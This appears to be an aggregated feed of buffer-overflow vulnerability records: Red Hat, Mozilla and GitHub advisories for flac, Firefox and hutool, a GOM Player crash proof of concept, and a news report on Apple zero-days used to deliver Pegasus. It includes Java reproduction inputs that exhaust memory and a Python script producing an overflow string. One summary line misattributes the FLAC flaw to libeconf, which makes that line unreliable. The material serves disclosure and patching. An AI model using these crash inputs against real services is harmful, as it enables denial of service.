An update for flac is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2020-22219: A flaw was found in the libeconf library. This issue occurs due to a buffer overflow vulnerability in the bitwriter_grow_ function in FLAC that allows remote attackers to run arbitrary code via crafted input to the encoder.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-09-11

Updated:

2023-09-11

**RHSA-2023:5043 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: flac security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for flac is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

FLAC stands for Free Lossless Audio Codec. FLAC is similar to Ogg Vorbis, but lossless. The FLAC project consists of the stream format, reference encoders and decoders in library form, a command-line program to encode and decode FLAC files, and a command-line metadata editor for FLAC files.  

Security Fix(es):  

*   flac: Remote Code Execution (RCE) via the bitwriter\_grow\_ function, by supplying crafted input to the encoder (CVE-2020-22219)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux Server - AUS 8.2 x86\_64
*   Red Hat Enterprise Linux Server - TUS 8.2 x86\_64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.2 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.2 x86\_64

**Fixes**

*   BZ - 2235489 - CVE-2020-22219 flac: Remote Code Execution (RCE) via the bitwriter\_grow\_ function, by supplying crafted input to the encoder

**Red Hat Enterprise Linux Server - AUS 8.2**

SRPM

flac-1.3.2-9.el8\_2.1.src.rpm

SHA-256: 1e9539e36eab4b4b99dac3dbe38171099d161fcb29855cad1e22c05fe2ab1459

x86\_64

flac-debuginfo-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: a7d089774dc5550163de6117abfde85d0fb4607ddea8133f123d4d8c88cf4475

flac-debuginfo-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: a8eb591fc570d168ff4ffb48d96b88dd20dd3f692141fbf572b8457ed236823e

flac-debugsource-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: d17ab6e4ab1303c0828f9de40ac1807e056d8a112df6a71bb8e3e1399c9e70d4

flac-debugsource-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: e06b2442e6bbc48598b79a7028227066b29483740612f2c0f2772c2f2da4a330

flac-libs-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: 1b434255b08ff7e707f1f260655ea43d0dcbab4acc5686f9ac68dd791d6e7dbf

flac-libs-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: 788e53f23a13d2c5f4af12a5b85de2839ece19130eef489d6d16bdd430640285

flac-libs-debuginfo-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: 59a6683355afa955bdfe5ccad38d31ac7774e2a530d554ca40d6fa61662f5244

flac-libs-debuginfo-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: 2ecb337161b44e6f15a4e181202e782617480998f5a3336a1fdf764a716007db

**Red Hat Enterprise Linux Server - TUS 8.2**

SRPM

flac-1.3.2-9.el8\_2.1.src.rpm

SHA-256: 1e9539e36eab4b4b99dac3dbe38171099d161fcb29855cad1e22c05fe2ab1459

x86\_64

flac-debuginfo-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: a7d089774dc5550163de6117abfde85d0fb4607ddea8133f123d4d8c88cf4475

flac-debuginfo-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: a8eb591fc570d168ff4ffb48d96b88dd20dd3f692141fbf572b8457ed236823e

flac-debugsource-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: d17ab6e4ab1303c0828f9de40ac1807e056d8a112df6a71bb8e3e1399c9e70d4

flac-debugsource-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: e06b2442e6bbc48598b79a7028227066b29483740612f2c0f2772c2f2da4a330

flac-libs-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: 1b434255b08ff7e707f1f260655ea43d0dcbab4acc5686f9ac68dd791d6e7dbf

flac-libs-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: 788e53f23a13d2c5f4af12a5b85de2839ece19130eef489d6d16bdd430640285

flac-libs-debuginfo-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: 59a6683355afa955bdfe5ccad38d31ac7774e2a530d554ca40d6fa61662f5244

flac-libs-debuginfo-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: 2ecb337161b44e6f15a4e181202e782617480998f5a3336a1fdf764a716007db

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.2**

SRPM

flac-1.3.2-9.el8\_2.1.src.rpm

SHA-256: 1e9539e36eab4b4b99dac3dbe38171099d161fcb29855cad1e22c05fe2ab1459

ppc64le

flac-debuginfo-1.3.2-9.el8\_2.1.ppc64le.rpm

SHA-256: b552297f25c41c64a8d8c7c573aee97bbc4bfb2f8056dbc573a2f958dd210ee5

flac-debugsource-1.3.2-9.el8\_2.1.ppc64le.rpm

SHA-256: 65204417a7a3bf196a4048c2da1b3b8a552edb43ab526fdc164a727b84d35f03

flac-libs-1.3.2-9.el8\_2.1.ppc64le.rpm

SHA-256: d322be181172559bdb9c7f83e4e4cef9f7940e075b97efa1367eb5f6c1dc7662

flac-libs-debuginfo-1.3.2-9.el8\_2.1.ppc64le.rpm

SHA-256: c35e92199baba9e811205079f5ed950c3b963c05df4f27b5111a34c84e8932b8

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.2**

SRPM

flac-1.3.2-9.el8\_2.1.src.rpm

SHA-256: 1e9539e36eab4b4b99dac3dbe38171099d161fcb29855cad1e22c05fe2ab1459

x86\_64

flac-debuginfo-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: a7d089774dc5550163de6117abfde85d0fb4607ddea8133f123d4d8c88cf4475

flac-debuginfo-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: a8eb591fc570d168ff4ffb48d96b88dd20dd3f692141fbf572b8457ed236823e

flac-debugsource-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: d17ab6e4ab1303c0828f9de40ac1807e056d8a112df6a71bb8e3e1399c9e70d4

flac-debugsource-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: e06b2442e6bbc48598b79a7028227066b29483740612f2c0f2772c2f2da4a330

flac-libs-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: 1b434255b08ff7e707f1f260655ea43d0dcbab4acc5686f9ac68dd791d6e7dbf

flac-libs-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: 788e53f23a13d2c5f4af12a5b85de2839ece19130eef489d6d16bdd430640285

flac-libs-debuginfo-1.3.2-9.el8\_2.1.i686.rpm

SHA-256: 59a6683355afa955bdfe5ccad38d31ac7774e2a530d554ca40d6fa61662f5244

flac-libs-debuginfo-1.3.2-9.el8\_2.1.x86\_64.rpm

SHA-256: 2ecb337161b44e6f15a4e181202e782617480998f5a3336a1fdf764a716007db

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:5043: Red Hat Security Advisory: flac security update

When receiving rendering data over IPC `mStream` could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash. This vulnerability affects Firefox < 117, Firefox ESR < 102.15, Firefox ESR < 115.2, and Thunderbird < 115.2.

**Mozilla Foundation Security Advisory 2023-34**

Announced

August 29, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 117

**#CVE-2023-4573: Memory corruption in IPC CanvasTranslator**

Reporter

sonakkbi

Impact

high

**Description**

When receiving rendering data over IPC mStream could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846687

**#CVE-2023-4574: Memory corruption in IPC ColorPickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the Color Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846688

**#CVE-2023-4575: Memory corruption in IPC FilePickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the File Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846689

**#CVE-2023-4576: Integer Overflow in RecordedSourceSurfaceCreation**

Reporter

fffvr

Impact

high

**Description**

On Windows, an integer overflow could occur in RecordedSourceSurfaceCreation which resulted in a heap buffer overflow potentially leaking sensitive data that could have led to a sandbox escape.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1846694

**#CVE-2023-4577: Memory corruption in JIT UpdateRegExpStatics**

Reporter

Lukas Bernhard

Impact

high

**Description**

When UpdateRegExpStatics attempted to access initialStringHeap it could already have been garbage collected prior to entering the function, which could potentially have led to an exploitable crash.

**References**

*   Bug 1847397

**#CVE-2023-4578: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception**

Reporter

Irvan Kurniawan (@sourc7)

Impact

moderate

**Description**

When calling JS::CheckRegExpSyntax a Syntax Error could have been set which would end in calling convertToRuntimeErrorAndClear. A path in the function could attempt to allocate memory when none is available which would have caused a newly created Out of Memory exception to be mishandled as a Syntax Error.

**References**

*   Bug 1839007

**#CVE-2023-4579: Persisted search terms were formatted as URLs**

Reporter

Malte Jürgens

Impact

moderate

**Description**

Search queries in the default search engine could appear to have been the currently navigated URL if the search query itself was a well formed URL. This could have led to a site spoofing another if it had been maliciously set as the default search engine.

**References**

*   Bug 1842766

**#CVE-2023-4580: Push notifications saved to disk unencrypted**

Reporter

Harveer Singh

Impact

moderate

**Description**

Push notifications stored on disk in private browsing mode were not being encrypted potentially allowing the leak of sensitive information.

**References**

*   Bug 1843046

**#CVE-2023-4581: XLL file extensions were downloadable without warnings**

Reporter

Umar Farooq (@Puf)

Impact

moderate

**Description**

Excel .xll add-in files did not have a blocklist entry in Firefox's executable blocklist which allowed them to be downloaded without any warning of their potential harm.

**References**

*   Bug 1843758

**#CVE-2023-4582: Buffer Overflow in WebGL glGetProgramiv**

Reporter

Dohyun Lee (@l33d0hyun) of SSD-Disclosure Labs & DNSLab, Korea Univ.

Impact

low

**Description**

Due to large allocation checks in Angle for glsl shaders being too lenient a buffer overflow could have occured when allocating too much private shader memory on mac OS.  
_This bug only affects Firefox on macOS. Other operating systems are unaffected._

**References**

*   Bug 1773874

**#CVE-2023-4583: Browsing Context potentially not cleared when closing Private Window**

Reporter

Thejaka Maldeniya

Impact

low

**Description**

When checking if the Browsing Context had been discarded in HttpBaseChannel, if the load group was not available then it was assumed to have already been discarded which was not always the case for private channels after the private session had ended.

**References**

*   Bug 1842030

**#CVE-2023-4584: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2**

Reporter

Randell Jesup, Andrew McCreight, the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 102.14, Firefox ESR 115.1, Thunderbird 102.14, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2

**#CVE-2023-4585: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2**

Reporter

Donal Meehan, Sebastian Hengst, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 115.1, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

CVE-2023-4573: Security Vulnerabilities fixed in Firefox 117

hutool v5.8.21 was discovered to contain a buffer overflow via the component `JSONUtil.parse()`.

**hutool Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Sep 9, 2023 to the GitHub Advisory Database • Updated Sep 11, 2023

GHSA-rr66-qh5m-w6mx: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonObject.putByPath`.

GHSA-7p8c-crfr-q93p: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonArray`.

GHSA-rxgf-r843-g53h: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component JSONUtil.parse().

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONUtil;

public class JSONOUtilTest {

    public static void main(String\[\] args) {
       String s = "{\\"G\\":00,\[,,\[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697\],\]}";
        new JSONOUtilTest().testHutoolJSON(s);
        new JSONOUtilTest().testGson(s);
    }

       // hutool-json测试
        public void testHutoolJSON (String str) {
            JSON json = JSONUtil.parse(str);
        }

        // gson测试
        public void testGson (String str) {
            Gson gson = new GsonBuilder().setPrettyPrinting().create();
            JSONObject entries = gson.fromJson(str, JSONObject.class);
            System.out.println(entries.toStringPretty());
        }
}

2.  堆栈信息

我们的服务使用了hutool-json来将字符串解析为json，当我们接收到的字符串为"{\"G\":00,[,,[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697],]}"时，JSONUtil.parse()挂起一段时间，然后服务崩溃，报错：

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3332)
    	at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    	at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:649)
    	at java.lang.StringBuffer.append(StringBuffer.java:387)
    	at java.io.StringWriter.write(StringWriter.java:77)
    	at cn.hutool.json.serialize.JSONWriter.writeRaw(JSONWriter.java:392)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:231)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.serialize.JSONWriter.writeObjValue(JSONWriter.java:257)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:239)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:543)
    	at cn.hutool.json.JSON.toJSONString(JSON.java:120)
    	at cn.hutool.json.JSONArray.toString(JSONArray.java:522)
    	at cn.hutool.json.JSONParser.parseTo(JSONParser.java:69)
    	at cn.hutool.json.ObjectMapper.mapFromTokener(ObjectMapper.java:243)
    	at cn.hutool.json.ObjectMapper.mapFromStr(ObjectMapper.java:219)
    	at cn.hutool.json.ObjectMapper.map(ObjectMapper.java:98)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:210)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:187)
    	at cn.hutool.json.JSONUtil.parseObj(JSONUtil.java:112)
    	at cn.hutool.json.JSONUtil.parse(JSONUtil.java:227)
    

经测试，我们发现，如果使用gson解析上述字符串，gson能够捕获异常：

    Exception in thread "main" com.google.gson.JsonSyntaxException: duplicate key: G
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:190)
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:145)
    	at com.google.gson.Gson.fromJson(Gson.java:932)
    	at com.google.gson.Gson.fromJson(Gson.java:897)
    	at com.google.gson.Gson.fromJson(Gson.java:846)
    	at com.google.gson.Gson.fromJson(Gson.java:817)
    	at JSONOUtilTest.testGson(JSONOUtilTest.java:43)
    	at JSONOUtilTest.main(JSONOUtilTest.java:54)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

通过与gson运行结果的对比，JSONUtil.parse()方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患。

CVE-2023-42278: `JSONUtil.parse()`方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患 · Issue #3289 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONObject jSONObject = new JSONObject();
        Object value = new Object();
        jSONObject.putByPath("...z.888888888", value);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:435)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:414)
    	at cn.hutool.core.bean.BeanUtil.setFieldValue(BeanUtil.java:312)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:150)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:115)
    	at cn.hutool.json.JSONObject.putByPath(JSONObject.java:325)
    	at JSONObjectTest.main(JSONObjectTest.java:39)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。

2 participants

CVE-2023-42277: `putByPath()`方法抛出OutOfMemory异常 · Issue #3285 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONArray jSONArray = new JSONArray();
        Object element = new Object();
        jSONArray.add(1247626122, element);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:461)
    	at JSONArrayFuzzerTest19.main(JSONArrayFuzzerTest19.java:37)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

jsonArray.add(idx, [element)会在指定索引idx添加一个元素element。如果jsonArray长度小于指定索引，jsonArray.add()就会通过循环不断添加null，直到jsonArray的长度等于指定索引值。如果这个索引特别大，比如1247626122，就会报告一个OOM异常。

CVE-2023-42276: `JSONArray`的`add()`方法抛出OutOfMemory异常 · Issue #3286 · dromara/hutool

GOM Player version 2.3.90.5360 suffers from a buffer overflow vulnerability.

    # Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 30.08.2023# Vendor Homepage: https://www.gomlab.com# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Tested Version: 2.3.90.5360 (latest)# Tested on: Windows 11 64bit# Thanks to: M. Akil GÜNDOĞAN#  - Open GOM Player#  - Click on the gear icon above to open settings#  - From the menu that appears, select Audio#  - Click on Equalizer#  - Click on the plus sign to go to the "Add EQ preset" screen#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK#  - Crashed!#!/usr/bin/pythonexploit = 'A' * 260try:    file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC is not created")

GOM Player 2.3.90.5360 Buffer Overflow

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.
The issues are described as below -

CVE-2023-41061 - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
CVE-2023-41064

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.

The issues are described as below -

*   **CVE-2023-41061** - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
*   **CVE-2023-41064** - A buffer overflow issue in the Image I/O component that could result in arbitrary code execution when processing a maliciously crafted image.

While CVE-2023-41064 was found by the Citizen Lab at the University of Torontoʼs Munk School, CVE-2023-41061 was discovered internally by Apple, with "assistance" from the Citizen Lab.

The updates are available for the following devices and operating systems -

*   **iOS 16.6.1 and iPadOS 16.6.1** - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   **macOS Ventura 13.5.2** - macOS devices running macOS Ventura
*   **watchOS 9.6.2** - Apple Watch Series 4 and later

In a separate alert, Citizen Lab revealed that the twin flaws have been weaponized as part of a zero-click iMessage exploit chain named BLASTPASS to deploy Pegasus on fully-patched iPhones running iOS 16.6.

"The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim," the interdisciplinary laboratory said. "The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."

Additional technical specifics about the shortcomings have been withheld in light of active exploitation. That said, the exploit is said to bypass the BlastDoor sandbox framework set up by Apple to mitigate zero-click attacks.

"This latest find shows once again that civil society is targeted by highly sophisticated exploits and mercenary spyware," Citizen Lab said, adding the issues were found last week when examining the device of an unidentified individual employed by a Washington D.C.-based civil society organization with international offices.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

Cupertino has so far fixed a total of 13 zero-day bugs in its software since the start of the year. The latest updates also arrive more than a month after the company shipped fixes for an actively exploited kernel flaw (CVE-2023-38606).

News of the zero-days comes as the Chinese government is believed to have ordered a ban prohibiting central and state government officials from using iPhones and other foreign-branded devices for work in an attempt to reduce reliance on overseas technology and amid an escalating Sino-U.S. trade war.

"The real reason \[for the ban\] is: cybersecurity (surprise surprise)," Zuk Avraham, security researcher and founder of Zimperium, said in a post on X. "iPhones have an image of being the most secure phone... but in reality, iPhones are not safe at all against simple espionage."

"Don't believe me? Just look at the number of 0-clicks commercial companies like NSO had over the years to understand that there is almost nothing an individual, an organization, or a government can do to protect itself against cyber espionage via iPhones."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#buffer_overflow